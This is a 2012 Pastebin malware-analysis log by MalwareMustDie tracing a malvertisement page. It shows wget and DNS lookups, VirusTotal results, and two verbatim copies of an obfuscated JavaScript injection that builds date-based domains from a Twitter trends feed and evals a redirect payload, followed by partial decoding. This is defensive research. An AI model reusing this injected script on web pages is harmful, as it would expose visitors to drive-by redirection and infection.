API tools faq
paste
Advertisement
MalwareMustDie

#MalwareMustDie! New PseudoRND/DGA Not RunForrest

MalwareMustDie
Nov 11th, 2012
1,511
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 29.38 KB | None | 0 0
raw download clone embed print report
  1. =====================================
  2. #MalwareMustDie - Other PseudoRandom Generator
  3. @unixfreaxjp ~]$ date
  4. Mon Nov 12 02:01:17 JST 2012
  5. Below is the log and necessary data...
  6. Deeper Obfuscation is under process
  7. =======================================
  8.  
  9. //I run into interesting malvertisement spam, leads me to this url:
  10.  
  11. h00p://sminkes.jatekokingyen.com/index.php?id=39&task=view
  12.  
  13. //tor'ing
  14.  
  15. --2012-11-12 01:22:09-- h00p://sminkes.jatekokingyen.com/index.php?id=39&task=view
  16. Resolving localhost (localhost)... 127.0.0.1, ::1
  17. Connecting to localhost (localhost)|127.0.0.1|:8118... connected.
  18. Proxy request sent, awaiting response... 200 OK
  19. ---response begin---
  20. HTTP/1.1 200 OK
  21. Date: Sun, 11 Nov 2012 16:27:44 GMT
  22. Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0d mod_fcgid/2.3.6 mod_auth_pgsql/2.0.3
  23. X-Powered-By: PHP/4.4.9
  24. Set-Cookie: ava_plays=1; expires=Tue, 19 Feb 2013 16:27:44 GMT
  25. Connection: close
  26. Transfer-Encoding: chunked
  27. Content-Type: text/html
  28. Length: unspecified [text/html]
  29. Saving to: `index.php?id=39&task=view.1'
  30. 2012-11-12 01:22:14 (16.5 KB/s) - `index.php?id=39&task=view.1' saved [34282]
  31.  
  32. //host is in here....
  33. $ host -ta sminkes.jatekokingyen.com
  34. sminkes.jatekokingyen.com has address 213.229.112.103
  35.  
  36. $ crackip 213.229.112.103
  37.  
  38. //ASN|Prefix|ASName|CN|Domain|ISP of an IP Address
  39. 29550 | 213.229.64.0/18 | SIMPLYTRANSIT | UK | 3V0.NET | SIMPLY TRANSIT LTD
  40.  
  41. // I checked in VT & found 2(two) references, the below one is my sample..
  42. // looks there is a same sample with the different MD5
  43.  
  44. MD5: 0895e3556e6e6b57a0750feaa8871f99
  45. File size: 33.5 KB ( 34282 bytes )
  46. File name: output.3267650.txt
  47. File type: HTML
  48. Tags: html
  49. Detection ratio: 29 / 44
  50. Analysis date: 2012-11-11 13:25:33 UTC
  51. https://www.virustotal.com/file/d9502a3d387fe24371f4b6a159d3d207f96cbbd9d414f35902848fd9f522c853/analysis/
  52.  
  53. MD5: 29da2c546276e0e92bf9b001c90a63b4
  54. File size: 33.5 KB ( 34273 bytes )
  55. File name: index.html
  56. File type: HTML
  57. Detection ratio: 29 / 44
  58. Analysis date: 2012-11-11 16:25:21 UTC
  59. https://www.virustotal.com/file/ffb36224bd5ef8dc7cb5be9f4430f571cd2f7e5f3914f14b45be05af0f7606c5/analysis/1352651121/
  60.  
  61.  
  62. // let's check any malc0de inside or not...
  63.  
  64. $ checkbadcode index.html
  65.  
  66. blah...blah..
  67. :
  68. <script language="javascript">function t(){return z($a);}var $a="Z73tZ3dZ22Z2573tZ253dZ2522Z2524Z2561Z253dstZ253bdZ2563Z2573Z2528Z2564Z2561+Z2564Z2562Z252bdZ2563+Z2564Z2564+Z2564eZ252cZ2531Z2530Z2529;Z2564Z2577(Z2573Z2574Z2529Z253bsZ2574Z253d$Z2561Z253bZ2522;Z22;caZ3dZ22Z2566uZ256ectZ2569Z256fnZ2520dZ2563Z2573Z2528dsZ252cesZ2529Z257bdsZ253dunZ2565sZ25Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25Z22;dcZ3dZ22rs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07huc7Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;Z22;ccZ3dZ22.leZ256egthZ253biZ252bZ252bZ2529Z257btmpZ253dds.Z2573licZ2565(i,Z2569+Z2531)Z22;deZ3dZ22209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;czZ3dZ22Z2566uncZ2574Z2569Z256fZ256e cZ257aZ2528Z2563z)Z257brZ2565turZ256eZ2520ca+Z2563b+cZ2563+cdZ252bcZ2565+Z2563z;Z257d;Z22;cbZ3dZ2263Z2561pe(Z2564s);Z2573tZ253dtZ256dZ2570Z253dZ2527Z2527;for(iZ253d0;iZ253cdsZ22;opZ3dZ22Z2524aZ253dZ2522dw(dcsZ2528Z2563u,1Z2534));Z2522;Z22;cdZ3dZ22Z253bZ2573Z2574Z253dst+SZ2574riZ256eg.Z2566rZ256fmCZ2568arCZ256fdZ2565((Z2574mZ22;dzZ3dZ22Z2566unZ2563tiZ256fnZ2520dZ2577(Z2574)Z257bcaZ253dZ2527Z252564ocuZ25256dZ2565nZ25257Z2534.Z252577Z2572iZ2525Z25374eZ2528Z25252Z2532Z2527;cZ2565Z253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253Z2563Z2573Z252563Z2572Z2569pZ252574 Z25256cZ252561Z25256eZ252567uaZ2567Z252565Z25253dZ25255cZ252522jZ2561Z2576aZ2573Z2563rZ252569pZ25257Z2534Z25255cZ25252Z2532Z2525Z2533eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscZ2572iZ2570Z252574Z25253eZ2527;evalZ2528unZ2565Z2573capZ2565(tZ2529)};Z22;ddZ3dZ2208y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25Z22;dbZ3dZ227FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0--0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0Z270;gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3e|u~wdx+m0yv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vZ22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;sZ7bxpyz;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;ceZ3dZ22pZ252ecZ2568arZ2543odZ2565At(Z2530)^(Z25270xZ25300Z2527+esZ2529)Z2529;}Z257dZ22;Z69f Z28docZ75Z6dZ65Z6etZ2ecoZ6fkZ69Z65.inZ64eZ78OZ66(Z27rf5Z66Z36Z64sZ27)Z3dZ3d-1)Z7bfunctioZ6e Z63aZ6cZ6cbaZ63kZ28xZ29Z7bwindZ6fw.Z74w Z3dZ20xZ3bZ76aZ72 Z64Z20Z3d nZ65wZ20DaZ74eZ28Z29;d.Z73Z65Z74TZ69me(Z78[Z22as_oZ66Z22]*1Z3000)Z3bvZ61r Z68Z20Z3d Z64.geZ74UTCZ48oZ75rs(Z29;wZ69nZ64ow.Z68 Z3d h;ifZ20(hZ20Z3e 8)Z7bd.setUZ54CDaZ74eZ28d.Z67eZ74UTZ43DaZ74Z65(Z29Z20Z2dZ202);Z7delsZ65Z7bd.sZ65tZ55TZ43Z44atZ65(d.Z67eZ74UTCZ44Z61te(Z29 - Z33);}Z77iZ6edoZ77.gZ64 Z3d d;Z76ar Z74imeZ20Z3d nZ65w AZ72rZ61Z79()Z3bvZ61r Z73hiZ66tIZ6edeZ78Z20Z3d Z22Z22;timZ65[Z22yearZ22] Z3d dZ2egZ65Z74Z55TCFZ75llYZ65aZ72Z28)Z3btimZ65[Z22montZ68Z22] Z3d d.Z67etZ55TCMZ6fntZ68()+Z31;tZ69mZ65Z5bZ22dZ61Z79Z22] Z3d d.Z67Z65Z74UZ54CDZ61te(Z29;iZ66 (dZ2eZ67Z65tZ55TZ43MonZ74h()Z2bZ31 Z3c 1Z30)Z7bshZ69Z66tZ49nZ64ex Z3dZ20tiZ6deZ5bZ22yearZ22] Z2b Z22Z2d0Z22Z20+ (Z64.gZ65tZ55Z54CMoZ6eZ74h()Z2b1)Z3b}eZ6csZ65Z7bsZ68iftZ49ndeZ78 Z3d Z74imZ65[Z22yeaZ72Z22] Z2b Z22-Z22 + (Z64Z2eZ67Z65Z74UTCZ4dontZ68(Z29Z2b1);Z7diZ66 (dZ2egetZ55TCZ44Z61tZ65Z28Z29 Z3c 10Z29Z7bshiZ66tZ49ndZ65xZ20Z3dshiZ66Z74InZ64exZ20+ Z22-0Z22 +Z20d.Z67eZ74UZ54CZ44ateZ28Z29;}eZ6cseZ7bZ73hiZ66tZ49ndZ65x Z3d Z73hifZ74IZ6eZ64ex Z2b Z22Z2dZ22 + dZ2eZ67eZ74Z55TZ43DatZ65();Z7dZ64ocuZ6denZ74.wrZ69Z74Z65(Z22Z3cscrZ22+Z22iptZ20laZ6eguaZ67eZ3djavasZ63ripZ74Z22+Z22 srcZ3dZ27hZ74Z74pZ3aZ2fZ2fsearZ63h.Z74witZ74erZ2ecoZ6dZ2ftrZ65ndZ73Z2fdailyZ2eZ6aZ73Z6fn?Z64Z61Z74eZ3dZ22+ shiZ66Z74IndZ65x+Z22&cZ61lZ6cbZ61cZ6bZ3dZ63alZ6cZ62acZ6b2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);} fuZ6ectZ69oZ6e caZ6clbZ61ck2Z28x)Z7bwiZ6eZ64owZ2etZ77Z20Z3d xZ3bsZ63Z28Z27rf5Z666dZ73Z27,Z32,7)Z3bevZ61lZ28uneZ73capZ65Z28Z64z+Z63Z7aZ2bopZ2bsZ74)+Z27dw(Z64zZ2bZ63Z7a($aZ2bst)Z29;Z27);doZ63Z75meZ6etZ2ewriZ74e(Z24a)Z3bZ7ddZ6fcuZ6dZ65ntZ2eZ77Z72Z69te(Z22Z3cimgZ20Z73rZ63Z3dZ27http:Z2fZ2fsearchZ2etZ77iZ74tZ65rZ2ecoZ6dZ2fZ69mZ61gesZ2fseZ61rchZ2frZ73s.pZ6egZ27 wZ69Z64thZ3d1Z20heZ69gZ68tZ3d1 sZ74ylZ65Z3dZ27visiZ62Z69liZ74Z79:hiZ64deZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt Z6cZ61nZ67uaZ67eZ3djZ61vZ61Z73cZ72iptZ22+Z22 srcZ3dZ27httpZ3aZ2fZ2fZ73eZ61rZ63h.Z74witZ74er.Z63oZ6dZ2ftrenZ64sZ2fZ64aZ69ly.Z6asonZ3fZ63alZ6cbaZ63kZ3dcZ61llZ62aZ63kZ27Z3eZ22 + Z22Z3cZ2fsZ63rZ22 + Z22ipZ74Z3eZ22)Z3bZ7dZ65lseZ7bZ24aZ3dZ27Z27};functZ69Z6fn sZ63(cnZ6d,vZ2cedZ29Z7bvaZ72 Z65Z78dZ3dnZ65w Z44atZ65Z28);eZ78Z64.Z73Z65tZ44ateZ28exdZ2egeZ74DaZ74Z65()Z2bZ65d)Z3bdZ6fcumZ65ntZ2ecooZ6bieZ3dcZ6emZ2bZ20Z27Z3dZ27 +escaZ70e(Z76)Z2bZ27;Z65xpZ69Z72Z65Z73Z3dZ27+exd.tZ6fGZ4dZ54StrZ69Z6eZ67()Z3b}Z3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}var x=0;eval(t());</script>
  69. <script language="javascript">function t(){return z($a);}var $a="Z73tZ3dZ22Z2573tZ253dZ2522Z2524Z2561Z253dstZ253bdZ2563Z2573Z2528Z2564Z2561+Z2564Z2562Z252bdZ2563+Z2564Z2564+Z2564eZ252cZ2531Z2530Z2529;Z2564Z2577(Z2573Z2574Z2529Z253bsZ2574Z253d$Z2561Z253bZ2522;Z22;caZ3dZ22Z2566uZ256ectZ2569Z256fnZ2520dZ2563Z2573Z2528dsZ252cesZ2529Z257bdsZ253dunZ2565sZ25Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25Z22;dcZ3dZ22rs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07huc7Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;Z22;ccZ3dZ22.leZ256egthZ253biZ252bZ252bZ2529Z257btmpZ253dds.Z2573licZ2565(i,Z2569+Z2531)Z22;deZ3dZ22209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;czZ3dZ22Z2566uncZ2574Z2569Z256fZ256e cZ257aZ2528Z2563z)Z257brZ2565turZ256eZ2520ca+Z2563b+cZ2563+cdZ252bcZ2565+Z2563z;Z257d;Z22;cbZ3dZ2263Z2561pe(Z2564s);Z2573tZ253dtZ256dZ2570Z253dZ2527Z2527;for(iZ253d0;iZ253cdsZ22;opZ3dZ22Z2524aZ253dZ2522dw(dcsZ2528Z2563u,1Z2534));Z2522;Z22;cdZ3dZ22Z253bZ2573Z2574Z253dst+SZ2574riZ256eg.Z2566rZ256fmCZ2568arCZ256fdZ2565((Z2574mZ22;dzZ3dZ22Z2566unZ2563tiZ256fnZ2520dZ2577(Z2574)Z257bcaZ253dZ2527Z252564ocuZ25256dZ2565nZ25257Z2534.Z252577Z2572iZ2525Z25374eZ2528Z25252Z2532Z2527;cZ2565Z253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253Z2563Z2573Z252563Z2572Z2569pZ252574 Z25256cZ252561Z25256eZ252567uaZ2567Z252565Z25253dZ25255cZ252522jZ2561Z2576aZ2573Z2563rZ252569pZ25257Z2534Z25255cZ25252Z2532Z2525Z2533eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscZ2572iZ2570Z252574Z25253eZ2527;evalZ2528unZ2565Z2573capZ2565(tZ2529)};Z22;ddZ3dZ2208y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25Z22;dbZ3dZ227FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0--0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0Z270;gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3e|u~wdx+m0yv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vZ22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;sZ7bxpyz;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;ceZ3dZ22pZ252ecZ2568arZ2543odZ2565At(Z2530)^(Z25270xZ25300Z2527+esZ2529)Z2529;}Z257dZ22;Z69f Z28docZ75Z6dZ65Z6etZ2ecoZ6fkZ69Z65.inZ64eZ78OZ66(Z27rf5Z66Z36Z64sZ27)Z3dZ3d-1)Z7bfunctioZ6e Z63aZ6cZ6cbaZ63kZ28xZ29Z7bwindZ6fw.Z74w Z3dZ20xZ3bZ76aZ72 Z64Z20Z3d nZ65wZ20DaZ74eZ28Z29;d.Z73Z65Z74TZ69me(Z78[Z22as_oZ66Z22]*1Z3000)Z3bvZ61r Z68Z20Z3d Z64.geZ74UTCZ48oZ75rs(Z29;wZ69nZ64ow.Z68 Z3d h;ifZ20(hZ20Z3e 8)Z7bd.setUZ54CDaZ74eZ28d.Z67eZ74UTZ43DaZ74Z65(Z29Z20Z2dZ202);Z7delsZ65Z7bd.sZ65tZ55TZ43Z44atZ65(d.Z67eZ74UTCZ44Z61te(Z29 - Z33);}Z77iZ6edoZ77.gZ64 Z3d d;Z76ar Z74imeZ20Z3d nZ65w AZ72rZ61Z79()Z3bvZ61r Z73hiZ66tIZ6edeZ78Z20Z3d Z22Z22;timZ65[Z22yearZ22] Z3d dZ2egZ65Z74Z55TCFZ75llYZ65aZ72Z28)Z3btimZ65[Z22montZ68Z22] Z3d d.Z67etZ55TCMZ6fntZ68()+Z31;tZ69mZ65Z5bZ22dZ61Z79Z22] Z3d d.Z67Z65Z74UZ54CDZ61te(Z29;iZ66 (dZ2eZ67Z65tZ55TZ43MonZ74h()Z2bZ31 Z3c 1Z30)Z7bshZ69Z66tZ49nZ64ex Z3dZ20tiZ6deZ5bZ22yearZ22] Z2b Z22Z2d0Z22Z20+ (Z64.gZ65tZ55Z54CMoZ6eZ74h()Z2b1)Z3b}eZ6csZ65Z7bsZ68iftZ49ndeZ78 Z3d Z74imZ65[Z22yeaZ72Z22] Z2b Z22-Z22 + (Z64Z2eZ67Z65Z74UTCZ4dontZ68(Z29Z2b1);Z7diZ66 (dZ2egetZ55TCZ44Z61tZ65Z28Z29 Z3c 10Z29Z7bshiZ66tZ49ndZ65xZ20Z3dshiZ66Z74InZ64exZ20+ Z22-0Z22 +Z20d.Z67eZ74UZ54CZ44ateZ28Z29;}eZ6cseZ7bZ73hiZ66tZ49ndZ65x Z3d Z73hifZ74IZ6eZ64ex Z2b Z22Z2dZ22 + dZ2eZ67eZ74Z55TZ43DatZ65();Z7dZ64ocuZ6denZ74.wrZ69Z74Z65(Z22Z3cscrZ22+Z22iptZ20laZ6eguaZ67eZ3djavasZ63ripZ74Z22+Z22 srcZ3dZ27hZ74Z74pZ3aZ2fZ2fsearZ63h.Z74witZ74erZ2ecoZ6dZ2ftrZ65ndZ73Z2fdailyZ2eZ6aZ73Z6fn?Z64Z61Z74eZ3dZ22+ shiZ66Z74IndZ65x+Z22&cZ61lZ6cbZ61cZ6bZ3dZ63alZ6cZ62acZ6b2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);} fuZ6ectZ69oZ6e caZ6clbZ61ck2Z28x)Z7bwiZ6eZ64owZ2etZ77Z20Z3d xZ3bsZ63Z28Z27rf5Z666dZ73Z27,Z32,7)Z3bevZ61lZ28uneZ73capZ65Z28Z64z+Z63Z7aZ2bopZ2bsZ74)+Z27dw(Z64zZ2bZ63Z7a($aZ2bst)Z29;Z27);doZ63Z75meZ6etZ2ewriZ74e(Z24a)Z3bZ7ddZ6fcuZ6dZ65ntZ2eZ77Z72Z69te(Z22Z3cimgZ20Z73rZ63Z3dZ27http:Z2fZ2fsearchZ2etZ77iZ74tZ65rZ2ecoZ6dZ2fZ69mZ61gesZ2fseZ61rchZ2frZ73s.pZ6egZ27 wZ69Z64thZ3d1Z20heZ69gZ68tZ3d1 sZ74ylZ65Z3dZ27visiZ62Z69liZ74Z79:hiZ64deZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt Z6cZ61nZ67uaZ67eZ3djZ61vZ61Z73cZ72iptZ22+Z22 srcZ3dZ27httpZ3aZ2fZ2fZ73eZ61rZ63h.Z74witZ74er.Z63oZ6dZ2ftrenZ64sZ2fZ64aZ69ly.Z6asonZ3fZ63alZ6cbaZ63kZ3dcZ61llZ62aZ63kZ27Z3eZ22 + Z22Z3cZ2fsZ63rZ22 + Z22ipZ74Z3eZ22)Z3bZ7dZ65lseZ7bZ24aZ3dZ27Z27};functZ69Z6fn sZ63(cnZ6d,vZ2cedZ29Z7bvaZ72 Z65Z78dZ3dnZ65w Z44atZ65Z28);eZ78Z64.Z73Z65tZ44ateZ28exdZ2egeZ74DaZ74Z65()Z2bZ65d)Z3bdZ6fcumZ65ntZ2ecooZ6bieZ3dcZ6emZ2bZ20Z27Z3dZ27 +escaZ70e(Z76)Z2bZ27;Z65xpZ69Z72Z65Z73Z3dZ27+exd.tZ6fGZ4dZ54StrZ69Z6eZ67()Z3b}Z3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}var x=0;eval(t());</script> [EOF]
  70.  
  71. //↑so we got 2(two) injected same malcodes.., what is this?↓
  72.  
  73. // decode it, use malzilla for this is enough, the below is decoded script, the upper one is
  74. // variables of dz , cz , op , st
  75.  
  76. st = "
  77. %73t%3d%22%24%61%3dst%3bd%63%73%28%64%61+%64%62%2bd%63+%64%64+%64e%2c%31%30%29;%64%77(%73%
  78. 74%29%3bs%74%3d$%61%3b%22;";
  79. ca = "%66u%6ect%69%6fn%20d%63%73%28ds%2ces%29%7bds%3dun%65s%";
  80. da = "
  81. fqb0t-7vrs}vyb>s%7F}7+0fqb0cxyvdY~tuh0-0%20+v%7Fb08fqb0y0y~0gy~t%7Fg>dg>dbu~tc9kyv08gy~t%7
  82. Fg>x0.0(0660gy~t%7Fg>x0,0%22!0660y>y~tuh_v870%20'790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcK
  83. yMK$M>aeubi>sxqbS%7FtuQd8!90;0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mu|cu0yv088gy~t%
  84. 7Fg>x0,0)0ll00gy~t%7Fg>x0.0%22%2090660y>y~tuh_v870!(790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~
  85. tcKyMK$M>aeubi>sxqbS%";
  86. dc = "
  87. rs}vyb>s%7F}7+fqb0}%7F~dxc0-0~ug0Qbbqi87e~%7F7<07tfu7<07dxb7<07vyb7<07fyv7<07huc7<07fuc7<0
  88. 7wxd7<07u~y7<07ud~7<07|uf7<07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7
  89. <7z7<7y7<7{7<7|7<7}7<7~7<7%7F7<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}rubc0-0
  90. ~ug0Qbbqi8!<%22<#<$<%<%26<'<(<)9+%19ve~sdy%7F~0Sq|se|qdu]qwys^e}rub8tqi<0}%7F~dx<0iuqb<0y~
  91. tuh9kbudeb~0888iuqb0;";
  92. cc = ".le%6egth%3bi%2b%2b%29%7btmp%3dds.%73lic%65(i,%69+%31)";
  93. de = "
  94. 209M0;0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0$90;0~e}9050!%209M+%19}%7F~dxSx0-0|uddubcK8
  95. 8dy}uK7}%7F~dx7M0;0~e}9050%22%9M0;0|uddubcK88dy}uK7}%7F~dx7M0:0~e}9050%22%9M+tqiSx0-0|uddu
  96. bcK88dy}uK7tqi7M0:0%269050%22'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050%22$9M+4
  97. q-4q>bu`|qsu8t<tqiSx0;0iuqbSx%220;0}%7F~dxSx0;0iuqbSx!0;0tqiSx0;0}%7F~dxcKdy}uK7}%7F~dx7M0
  98. =0!M0;07>s%7F}79+m";
  99. cz = "%66unc%74%69%6f%6e c%7a%28%63z)%7br%65tur%6e%20ca+%63b+c%63+cd%2bc%65+%63z;%7d;";
  100. cb = "63%61pe(%64s);%73t%3dt%6d%70%3d%27%27;for(i%3d0;i%3cds";
  101. op = "%24a%3d%22dw(dcs%28%63u,1%34));%22;";
  102. cd = "%3b%73%74%3dst+S%74ri%6eg.%66r%6fmC%68arC%6fd%65((%74m";
